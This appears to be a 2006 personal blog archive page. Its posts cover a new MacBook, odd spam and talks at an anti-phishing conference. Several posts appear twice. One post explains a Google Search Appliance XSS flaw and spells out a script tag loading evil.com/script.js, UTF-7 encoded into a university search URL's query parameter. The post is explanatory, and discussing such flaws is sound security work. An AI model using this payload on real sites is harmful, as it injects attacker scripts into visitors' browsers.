Thursday, November 30, 2006
new toy
On the 27th I ordered a new toy from Apple, well, okay, it's a computer so thus a tool for my research. I figured since I was buying a new laptop, I should go all out and get dongles for it too; it's important to be able to hook it to a monitor, projector or TV, so I bought an S-Video, a DVI, and a VGA dongle to plug into it. Funny thing, they arrived two days ago.
So needless to say, last night I was anxious for it to show up. FedEx was shipping it from China, and I had been following it on its travel through Alaska. When I went to bed, it was still en route from Alaska. FedEx woke me up at 8:30 by pounding the hell out of my door, and there it was! Incredibly fast. Go FedEx.
Anyhow, I'm as always infatuated with Apple's packages, so I slowly opened the sucker marveling at how they used a thick shipping box with only corner foam pieces to kind of minimize waste. (They have been getting lots of flack recently about being harmful to Ms. Earth.) Anyhow, inside the brown box was a really pretty marketing box that mostly shows off their presentation abilities.
Tearing through the tape, I pulled all the stuff out of the box noticing a new flavor of foam: it looked waffley. Stamped on the foam too was the MacBook logo. I still think it's odd that Apple goes through the trouble to make things so pretty when people will only see them once. Maybe it's for geeks like me who enjoy opening boxes way too much.
Box drooling aside (not quite as cool as the original cube iPod boxes), I pulled out my new workhorse and opened it up. I really like this new magnetic latch. One of my peeves about the 12" PowerBook is the flimsy latch.
Of course the best thing about the way Apple ships their laptops is the full battery. I've never seen instructions packaged with any battery-powered Apple product that says "plug in for charging before first use" or even "go buy a battery." They take good care of their customers -- cell phone manufacturers could take a hint from them.
Anyway, all things in order, I've set up the new MacBook just the way I want it, and am constantly being impressed by little things. For example:
There's lots of software that looks fun, including ComicLife... maybe I'll post a comic strip later.
So needless to say, last night I was anxious for it to show up. FedEx was shipping it from China, and I had been following it on its travel through Alaska. When I went to bed, it was still en route from Alaska. FedEx woke me up at 8:30 by pounding the hell out of my door, and there it was! Incredibly fast. Go FedEx.
Anyhow, I'm as always infatuated with Apple's packages, so I slowly opened the sucker marveling at how they used a thick shipping box with only corner foam pieces to kind of minimize waste. (They have been getting lots of flack recently about being harmful to Ms. Earth.) Anyhow, inside the brown box was a really pretty marketing box that mostly shows off their presentation abilities.
Tearing through the tape, I pulled all the stuff out of the box noticing a new flavor of foam: it looked waffley. Stamped on the foam too was the MacBook logo. I still think it's odd that Apple goes through the trouble to make things so pretty when people will only see them once. Maybe it's for geeks like me who enjoy opening boxes way too much. 
Box drooling aside (not quite as cool as the original cube iPod boxes), I pulled out my new workhorse and opened it up. I really like this new magnetic latch. One of my peeves about the 12" PowerBook is the flimsy latch.
Of course the best thing about the way Apple ships their laptops is the full battery. I've never seen instructions packaged with any battery-powered Apple product that says "plug in for charging before first use" or even "go buy a battery." They take good care of their customers -- cell phone manufacturers could take a hint from them.Anyway, all things in order, I've set up the new MacBook just the way I want it, and am constantly being impressed by little things. For example:
- During initial setup, you pick an image to represent your account. The software turned on the built-in iSight camera and let me take a photo of me (bed head and all)!
- Emacs compiled in 10 minutes (took over an hour on my old PowerBook).
- Target Disk mode rocks! I used my old laptop as an external FireWire hard disk to transfer all my documents and settings. Couldn't have been easier.
- Third-Party software, including games, were pre-installed. This included a Mancala game. I didn't know Mancala was even popular.
There's lots of software that looks fun, including ComicLife... maybe I'll post a comic strip later.
spammers concerned with fraud
It appears that some spammers are concerned with phishing and pharming attacks that will make it harder for people to find the real source of Viagra. To fight this, some spammers are telling people to actually type the url into the browser, and not follow links in the email.Honestly! You're at the bottom of the authority chain, you're a spammer. Just use a link.
(Link to a screengrab of the email)
Wednesday, November 29, 2006
google appliance xss
Multiple sources have been reporting a Google Appliance XSS attack. In short, the attack allows someone to tweak the variables sent to a search page in a way that lets arbitrary scripts from any domain to be executed on the results page.
Say I do a search at IU's search page, and when the results are shown to me I am directed to this url:
I can change the q and oe variables such that the q variable has <script src="evil.com/script.js"></script> encoded in UTF-7, and then set oe to UTF-7 so the q variable is decoded. Then when the results are shown, evil.com/script.js is loaded on the page.
This has been shown to manipulate the results page (see this example), but since the URL must be modified, and a search query must have already been submitted, I don't see an immediate use for this.
I guess one thing that could be done is as follows: an attacker could create a custom search portal that ignores the search terms provided by a user, then executes some javascript to screw with their computer. Of course, they must be initially directed to the evil search portal... is there another use for this "vulnerability" that escapes me?
Say I do a search at IU's search page, and when the results are shown to me I am directed to this url:
http://search.iu.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8&...
I can change the q and oe variables such that the q variable has <script src="evil.com/script.js"></script> encoded in UTF-7, and then set oe to UTF-7 so the q variable is decoded. Then when the results are shown, evil.com/script.js is loaded on the page.
This has been shown to manipulate the results page (see this example), but since the URL must be modified, and a search query must have already been submitted, I don't see an immediate use for this.
I guess one thing that could be done is as follows: an attacker could create a custom search portal that ignores the search terms provided by a user, then executes some javascript to screw with their computer. Of course, they must be initially directed to the evil search portal... is there another use for this "vulnerability" that escapes me?
Monday, November 20, 2006
powered by the Microsoft
I got an interesting spam today that said I won the Microsoft Lottery (the UK Microsoft Lottery). It was your usual email, except I'm sure it's performance was much better; there was a tag at the bottom that said:
this is powered by the Microsoft®
Friday, November 17, 2006
apwg: day 2, law and enforcement
Today was mostly geared towards law enforcement and legal arguments about how and why phishing (and other electronic fraud) are difficult to catch.
Stanley W. Crowder (Special Agent, US Secret Service)
Mr. Crowder talked about how the USSS investigates phishing to help find people, stop them, and generally protect consumers. He mentioned that there are lots of carding websites used for fraud. Also, there is a tremendous underground culture (or market) centered around stealing and using identity for financial gain. Take-Home message: Law enforcement needs help breaking through the technological barriers to catch bad guys.
Michael Levin (Dep. Dir. National Cyber Security Division, DHS)
Agent Levin gave a little insight about how his division at the DHS operates. It appeared to me that his emphasis was on DHS's main aim is to get different communities talking to each other (intelligence, academia, law enforcement). He believes all police should be equally well trained on cybercrime so they can help collect and identify digital evidence when they visit a crime scene. He also believes in establishing good relations between US feds and other countries' federal cops by "drinkin' beer or drinkin' vodka or wrestlin' with 'em" -- whatever it takes.
DHS interacts with the public via CyberCop. You can register for the CyberCop portal and obtain a weekly newsletter called "unusual suspects" sharing some sort of interesting information (don't know what).
Stanley W. Crowder (Special Agent, US Secret Service)
Mr. Crowder talked about how the USSS investigates phishing to help find people, stop them, and generally protect consumers. He mentioned that there are lots of carding websites used for fraud. Also, there is a tremendous underground culture (or market) centered around stealing and using identity for financial gain. Take-Home message: Law enforcement needs help breaking through the technological barriers to catch bad guys.
Michael Levin (Dep. Dir. National Cyber Security Division, DHS)
Agent Levin gave a little insight about how his division at the DHS operates. It appeared to me that his emphasis was on DHS's main aim is to get different communities talking to each other (intelligence, academia, law enforcement). He believes all police should be equally well trained on cybercrime so they can help collect and identify digital evidence when they visit a crime scene. He also believes in establishing good relations between US feds and other countries' federal cops by "drinkin' beer or drinkin' vodka or wrestlin' with 'em" -- whatever it takes.
DHS interacts with the public via CyberCop. You can register for the CyberCop portal and obtain a weekly newsletter called "unusual suspects" sharing some sort of interesting information (don't know what).
odd spam
Today I got spam consisting of a lot of random numbers chosen and formatted to spell out a domain name. Click the above picture to see the whole email. Kind of weird. Anyone else seen anything like this?
Update (17-Nov 12:17): It appears to be a very cryptic pump and dump scam. See the stock ticker on yahoo.
Thursday, November 16, 2006
apwg: Sven Karge
Sven Karge talked about legal implications of phishing in Germany. There were lots of subjective details, but in short, be really really careful if you fly through Germany after doing anti-phishing studies where you simulate sending phishy emails. There are lots of issues with copyright infringement, though the laws he presented seemed pretty fair -- criminal intent is important to prosecute. He also suggested ways to improve tracking and shut-down of international phishing operations:
"To prosecute, we need good international cooperation."This includes well-established and court-approved evidence sharing procedures so we can prosecute phishers in international courts.
Subscribe to:
Posts (Atom)